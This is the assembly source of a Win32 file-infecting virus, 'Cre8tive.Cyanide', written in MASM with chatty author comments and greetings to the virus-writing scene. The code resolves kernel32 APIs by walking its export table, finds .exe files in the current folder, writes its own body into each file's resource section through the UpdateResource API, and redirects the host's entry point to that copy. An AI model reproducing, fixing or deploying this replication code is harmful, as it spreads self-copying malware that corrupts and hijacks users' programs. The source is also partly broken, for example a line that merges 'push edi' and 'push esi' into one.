;----------------------------------------------------------------------------------------
;                        infecting PE_files' resources by using API
;
;Author: the_faked_minded/ibn_sina
;Name:   Cre8tive.Cyanide.alfa_1
;Origin: I___
;Date:   1/10/2003
;
;CommentZ: At first  
;          i dont know if any one out there in the world made something like that
;          i mean infecting the pe resource ok but this one i didnt have seen it
;          i totally made it by myself it is simply using the windows api which are
;          BeginUpdateResource,UpdateResource,EndUpdateResource..... 
;          finding the apis needed for my virus i used the hardcoding  method
;          i only give the idea of such infection ...ONLY REPLICATION by those apis
;         
;     BUGS: You may ask is this virus is buggy or not,,,,ok it is....
;           i found some bugs one of them is that some exes their .rsrc section
;           is not in the end and not big enough so the apis are gonna remove them
;           the other one is for some setup and installing files...ok i tested it
;           on some Installshield files and it worked...but there are still many bugs:)
;     
;   Final note: As i expiernced win32 PE virii i found there wasnt a perfect virus...!
;               I hope someday someone will do such thing..
;               i really put all my hope on this method since using m$ apis but it still not perfect :( 
;     PLEASE D0 n0t judge this virus is lame bcoz it is using API just see it,,,
;  SORRY  4 my english and for some code that may be replaced by better..I was lazy
;   Since college is wasting my time ..:(
;   Creative was the first virus i have been introduced to in early 1990s//
; *you can find your virus code by gaining access to resource tree..but i used a search method..
;
;---------------------------------------------------------------------------------------



.386
.model flat,stdcall
option casemap:none

include \masm32\include\windows.inc  ;i only use masm :>
include \masm32\include\user32.inc

includelib \masm32\lib\user32.lib


.data
 db "blah",0
.code
all:

jmp kill
start:
remark db "mak1"; remark for our code
kill: 
call delta_1
delta_1:
pop eax
mov ebp,eax
sub ebp,offset delta_1
push ebp

jmp over_data  ; jumping to the main code

mak db "shit",0
WinXp_kern dd 077e60000h  ;home edition
WinMe_kern dd 0bff60000h
CopyRight_string db "Cre8tive.Cyanide",0
CopyRight_toMe db "^faked_minded",0
GetProcAddressF db "GetProcAddress",0
AGetProcAddressF dd 0
BeepF db "Beep",0
PE_offset dd 0
Export_address dd 0
Export_size dd 0
Current_kern dd 0
function_no dd 0
function_addr dd 0
function_ord dd 0
function_name dd 0
base_ord dd 0

temp_handle dd 0
temp_memory dd 0
temp_size dd 0
bwr dd 0
old_ip dd 0
current_ip dd 0
ip_flag dd 0
image_base dd 00400000h
vir_len dd end_ - start
Res_handle dd 0

file_extension db "*.exe",0
win32find WIN32_FIND_DATA<>


apis_name:
ExitProcessF db "ExitProcess",0
CreateFileF db "CreateFileA",0
CloseHandleF db "CloseHandle",0
WriteFileF db "WriteFile",0
ReadFileF db "ReadFile",0
BeginUpdateResourceF db "BeginUpdateResourceA",0
UpdateResourceF db "UpdateResourceA",0
EndUpdateResourceF db "EndUpdateResourceA",0
GetFileSizeF db "GetFileSize",0
GlobalAllocF db "GlobalAlloc",0
SetFilePointerF db "SetFilePointer",0
SleepF db "Sleep",0
FindFirstFileF db "FindFirstFileA",0

dd 0ffh

apis_address:
AExitProcessF dd 0
ACreateFileF dd 0
ACloseHandleF dd 0
AWriteFileF dd 0
AReadFileF dd 0
ABeginUpdateResourceF dd 0
AUpdateResourceF dd 0
AEndUpdateResourceF dd 0
AGetFileSizeF dd 0
AGlobalAllocF dd 0
ASetFilePointerF dd 0
ASleepF dd 0
AFindFirstFileF dd 0

dd 0ffh


over_data: ;our code starts here

pop ebp

winxp_kern:

mov edi,[ebp+offset WinXp_kern]  ; hardcoded method :<
mov [ebp+offset Current_kern],edi
cmp word ptr [edi],"ZM"
je found_kern
winme_kern:
mov edi,[ebp+offset WinMe_kern]
mov [ebp+offset Current_kern],edi
cmp word ptr [edi],"ZM"
je found_kern            ;i had other kernel bases but i am tooo lazy..

jmp exit  
found_kern:    ; Hey you have WinXp or Me ....

add edi,[edi+3ch]      ;just checking
cmp word ptr [edi],"EP"
jne exit
mov dword ptr [ebp+offset PE_offset],edi
mov eax,[edi+78h]      ;export table rva
push eax
mov eax,[edi+7ch]      ;export table size 
mov [ebp+offset Export_size],eax
pop eax
mov [ebp+offset Export_address],eax
add eax,[ebp+offset Current_kern]
mov edx,[eax+16]               ;  ordinal base
add edx,[ebp+offset Current_kern]  
mov [ebp+offset base_ord],edx
mov edx,[eax+24]               ;no. of exported functions
mov [ebp+offset function_no],edx 
mov edx,[eax+28]              ;rva of exported functions
add edx,[ebp+offset Current_kern]
mov [ebp+offset function_addr],edx 
mov edx,[eax+32]              ; rva of exported function name
add edx,[ebp+offset Current_kern]
mov [ebp+offset function_name],edx
mov edx,[eax+36]  ;rva for name ordinal
add edx,[ebp+offset Current_kern]
mov [ebp+offset function_ord],edx
xor edx,edx 
xor eax,eax
mov eax,[ebp+offset function_name] ; getting the GetProcAddress api address
mov edx,offset GetProcAddressF
add edx,ebp
xor ecx,ecx
mov edi,[eax]
add edi,[ebp+offset Current_kern]

loop_search_1:
mov esi,edx
match_byte:

cmpsb
jne Next_one
cmp byte ptr [edi],0
je Got_it
jmp  match_byte

Next_one:
add cx,1
add eax,4
mov edi,[eax]
add edi,[ebp+offset Current_kern]

jmp loop_search_1
jmp exit
Got_it:

mov edi,[eax]
add edi,[ebp+offset Current_kern]
shl ecx,1
mov eax,[ebp+offset function_ord]
add eax,ecx
xor ecx,ecx
mov cx,word ptr [eax]
shl ecx,2
mov eax,[ebp+offset function_addr]
add eax,ecx
mov eax,[eax]
add eax,[ebp+offset Current_kern]
mov [ebp+offset AGetProcAddressF],eax

mov esi,offset apis_name  ;getting ready for api loop
add esi,ebp
mov edi,offset apis_address
add edi,ebp
loop_find_apis:
push esi
push dword ptr [ebp+offset Current_kern]
call dword ptr [ebp+offset AGetProcAddressF]
cmp eax,0
je exit
mov [edi],eax
loop_1: ;api search loop ...by using the GetProcAddress
cmp byte ptr [esi],0
je next_api
add esi,1
jmp loop_1
next_api:
add esi,1
cmp dword ptr [esi],0ffh
je end_search_api
add edi,4
jmp loop_find_apis

end_search_api:  ;got the api addresses that we gonna use

mov esi, offset win32find
add esi,ebp
push esi
mov esi, offset file_extension
add esi,ebp
push esi
call dword ptr [ebp+offset AFindFirstFileF]


mov edi,[ebp+offset old_ip] ;just..
mov dword ptr [ebp+offset current_ip],edi;taking the current application EIP before it was infected
push 0
push 0

push 3

push 0
push 2h

push 40000000h or 80000000h
mov eax,offset win32find.cFileName             
add eax,ebp
push eax
call dword ptr[ebp+offset ACreateFileF]  
cmp eax,0                                
je error
mov [ebp+offset temp_handle],eax
push 0
push eax
call dword ptr [ebp+offset AGetFileSizeF]
cmp eax,0
jbe exit

mov [ebp+offset temp_size],eax
push eax
push 0
call dword ptr [ebp+offset AGlobalAllocF]
mov  [ebp+offset temp_memory],eax
cmp eax,0
je exit

push 0

mov eax,offset bwr
add eax,ebp
push eax
push dword ptr [ebp+offset temp_size]
push dword ptr [ebp+offset temp_memory]
push dword ptr [ebp+offset temp_handle]
call dword ptr [ebp+offset AReadFileF]
push dword ptr [ebp+offset temp_handle]
call dword ptr [ebp+offset ACloseHandleF]

mov esi,dword ptr [ebp+offset temp_memory] ; the file is been read to memory so as to get the imagebase and EIP of the 
add esi,[esi+3ch]                        ;infected file before using the resource apis
cmp word ptr [esi],"EP"
jne exit
mov [ebp+offset PE_offset],esi
mov edi,dword ptr [esi+52]
mov [ebp+offset image_base],edi

mov edi,[esi+40]
add edi,[ebp+offset image_base]
mov [ebp+offset old_ip],edi

push FALSE
mov esi,offset win32find.cFileName
add esi,ebp
push esi
call dword ptr [ebp+offset ABeginUpdateResourceF] ;here is the star of the movie :)
cmp eax,0
je exit
mov dword ptr [ebp+offset Res_handle],eax
mov esi,offset start
mov edi,[ebp+offset vir_len]
add esi,ebp
push edipush esi
push LANG_ENGLISH
push 1304
push RT_RCDATA
push eax

call dword ptr [ebp+offset AUpdateResourceF]  ;copy our virus as Rt_RCDAT named 1304
cmp eax,0
je exit

pop eax
push FALSE 
push dword ptr [ebp+offset Res_handle]
call dword ptr [ebp+offset AEndUpdateResourceF]



push 0  ;Again open the file to make the other changes..i hate using the apis alot :(
push 0

push 3

push 0
push 2h

push 40000000h or 80000000h
mov eax,offset win32find.cFileName
add eax,ebp
push eax
call dword ptr[ebp+offset ACreateFileF]
cmp eax,0
je exit
mov [ebp+offset temp_handle],eax
push 0
mov eax,offset bwr
add eax,ebp
push eax
push dword ptr [ebp+offset temp_size]
push dword ptr [ebp+offset temp_memory]
push dword ptr [ebp+offset temp_handle]
call dword ptr [ebp+offset AReadFileF]

push dword ptr [ebp+offset temp_handle]
call dword ptr [ebp+offset ACloseHandleF]

mov esi,[ebp+offset temp_memory]
add esi,[esi+3ch]
xor ecx,ecx
xor ebx,ebx
mov cx,word ptr [esi+6]  ;from here we will start searching for the .rsrc section
mov bx,word ptr [esi+20]
add esi,24
add esi,ebx

mov edx,esi
xor ebx,ebx

search_resource_section:
cmp dword ptr [edx],"rsr."

je found_resource_section
add edx,40
add ebx,1
cmp ebx,ecx
je exit
jmp search_resource_section
found_resource_section:       ;found the .rsrc section
mov esi,[edx+16]
mov edx,[edx+20]
add edx,[ebp+offset temp_memory]  ;searching for the virus body position
xor ecx,ecx
mov ebx,offset remark
add ebx,ebp
push edx
xor eax,eax

loop_find_my_virus:
mov eax,dword ptr [edx]
cmp dword ptr [ebx],eax

je found_my_virus
add edx,4
cmp edx,esi
je exit
jmp loop_find_my_virus
found_my_virus: ; found the virus code body
pop ecx
sub edx,ecx
mov esi,[ebp+offset PE_offset]

mov ebx,dword ptr [esi+136] ;getting resource rva
add ebx,edx ;add the virus code position from the resource section place...---> it is place from the current position
add ebx,4
mov dword ptr [esi+40],ebx        ;setting the new entry point

push 0
push 0
push 3
push 0
push 2h
push 40000000h or 80000000h
mov eax,offset win32find.cFileName
add eax,ebp
push eax
call dword ptr[ebp+offset ACreateFileF]
cmp eax,0
je exit
mov [ebp+offset temp_handle],eax
push 0
mov esi,offset bwr
add esi,ebp
push esi
push dword ptr [ebp+offset temp_size]
push dword ptr [ebp+offset temp_memory]
push dword ptr [ebp+offset temp_handle]
call dword ptr [ebp+offset AWriteFileF]
push dword ptr [ebp+offset temp_handle]
call dword ptr [ebp+offset ACloseHandleF]      ;apply changes

jmp exit

error:
mov edi,[ebp+offset old_ip]
mov dword ptr [ebp+offset current_ip],edi


exit:
cmp dword ptr [ebp+offset current_ip],0  ;check if the current application is our virus-first launch
je virus_launcher
mov edi,dword ptr [ebp+offset current_ip]  ;if not back to host
jmp edi

virus_launcher:

push 0
call dword ptr [ebp+offset AExitProcessF]


end_:
end all ;end of story




;---------------------------------------------------------------------------------------------------------------------------
;finally specail thanx to all virus writers and their marvellous new thoughts...
;special thanx to my friend -mh- why dont u like viruses ..stop coding application programs with win32asm ;)
;for lord julus goes the that ---with out your tutorials i wouldnt know the vx scene well,,so as mort and quantum
;and thanx to win32asm programmers iczelion and exagone....
;and for all those people helped in spreaading this article....and before the bye amazing zines MATRIX
;dont forget using the PEWRSEC.com for the file...after compiling...
;          
;---------------------------------------------------------------------------------------------------------------------------